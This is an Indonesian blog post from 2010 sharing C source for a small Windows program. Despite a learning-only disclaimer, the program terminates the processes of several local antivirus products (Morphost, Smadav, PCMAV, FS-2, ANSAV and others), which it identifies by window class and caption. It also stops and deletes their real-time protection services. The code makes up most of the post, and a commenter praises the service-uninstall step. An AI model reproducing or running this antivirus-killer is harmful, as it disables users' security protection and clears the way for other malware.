[Iseng] Test Antivirus Lokal

By drubicza on June 2, 2010 in Antivirus, Junk, Security, Software

GPL alias Ga Pake Lama, berikut ini source code sederhana yang dibuat dalam tempo yang sesingkat-singkatnya.

/**
 * source code ini hanya untuk tujuan pembelajaran
 * TKP Crew tidak bertanggungjawab atas penggunaan
 * dan/atau penyalahgunaan source code ini.
 * USE AT YOUR OWN RISK. PERIOD
 */

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winsvc.h>

#ifdef _MSC_VER
#pragma comment(lib,"kernel32")
#pragma comment(lib,"advapi32")
#pragma comment(lib,"user32")
#pragma comment(lib,"msvcrt")
#pragma comment(linker,"/entry:main /subsystem:windows")
#endif

#define VB_MAIN "ThunderRT6Main"
#define VB_FORM "ThunderRT6FormDC"

struct {
  char *szcls;
  char *szcap;
} targets[] = {
  {VB_MAIN, "Morphost"},                    /* morphost */
  {VB_FORM, "autodetect"},                  /* morphost rtp */
  {VB_FORM, "Sys Tray Interface"},          /* smadav rtp */
  {"TFAdvMenu", "PCMAV Advanced Options"},  /* pcmav*/
  {"TFScanRD", "FScanRD"},                  /* pcmav rtp */
  {VB_FORM, "Configuration Settings"},      /* sven7 */
  {VB_FORM, "Ganti Warna"},                 /* FS-2 */
  {"#32770", "$FS-2$"},                     /* FS-2 rtp */
  {"ansav#2194", "ANSAV - BETA"},           /* ansav */
}, victim;

void
unreg_svc()
{
  int i;
  SC_HANDLE hSvc1, hSvc2;
  SERVICE_STATUS svc_stat;
  const char *szsvc[] = {"PCMAVRTPService", "ANSAVDaemon"};

  for (i =0; i < 2; i++)
  {
    if ((hSvc1 = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)) != NULL)
    {
      if ((hSvc2 = OpenService(hSvc1, szsvc[i], SERVICE_ALL_ACCESS)) != NULL)
      {
        ControlService(hSvc2, SERVICE_CONTROL_STOP, &svc_stat);
        DeleteService(hSvc2);
        CloseServiceHandle(hSvc2);
      }
      CloseServiceHandle(hSvc1);
    }
  }
}

BOOL
CALLBACK enum_proc(HWND hwnd, LPARAM lpar)
{
  int i;
  DWORD dwpid;
  HANDLE hproc;
  static char szcls[50];
  static char szcap[50];

  GetClassName(hwnd, szcls, sizeof(szcls)-1);
  GetWindowText(hwnd, szcap, sizeof(szcap)-1);

  for (i = 0; i < sizeof(targets)/sizeof(victim); i++)
  {
    if (strstr(targets[i].szcls, szcls) && strstr(targets[i].szcap, szcap))
    {
      GetWindowThreadProcessId(hwnd, &dwpid);
      if ((hproc = OpenProcess(PROCESS_TERMINATE, 0, dwpid)) != NULL)
      {
        TerminateProcess(hproc, 0);
        CloseHandle(hproc);
      }
      break;
    }
  }
  return 1;
}

void
main()
{
  __try {
    EnumWindows(enum_proc, 0);
    unreg_svc();
    MessageBox (NULL, "test antivirus lokal", "TKP", MB_OK | MB_ICONINFORMATION);
  }
  __except (EXCEPTION_EXECUTE_HANDLER) {
    ExitProcess(1);
  }
  ExitProcess(0);
}

About drubicza

View all posts by drubicza →

Subscribe to our e-mail newsletter to receive updates.

Antivirus, code, lokal, source, test

← Bermain-main Dengan WMI (Windows Management Instrumentation)

Aplikasi Iseng →

One Response to [Iseng] Test Antivirus Lokal

M2R July 14, 2010 at 16:14 #

weleh.
1. dapetin handle
2. terminate process
3. uninstall service <– :evil:

Good job :D

[Iseng] Test Antivirus Lokal

About drubicza

Subscribe

One Response to [Iseng] Test Antivirus Lokal

Leave a Reply Click here to cancel reply.

Search

Archives

Categories

Recent Tweets

Digital Works

[Iseng] Test Antivirus Lokal

About drubicza

Subscribe

Related Posts:

One Response to [Iseng] Test Antivirus Lokal

Leave a Reply Click here to cancel reply.

Search

Archives

Categories

Recent Tweets

Digital Works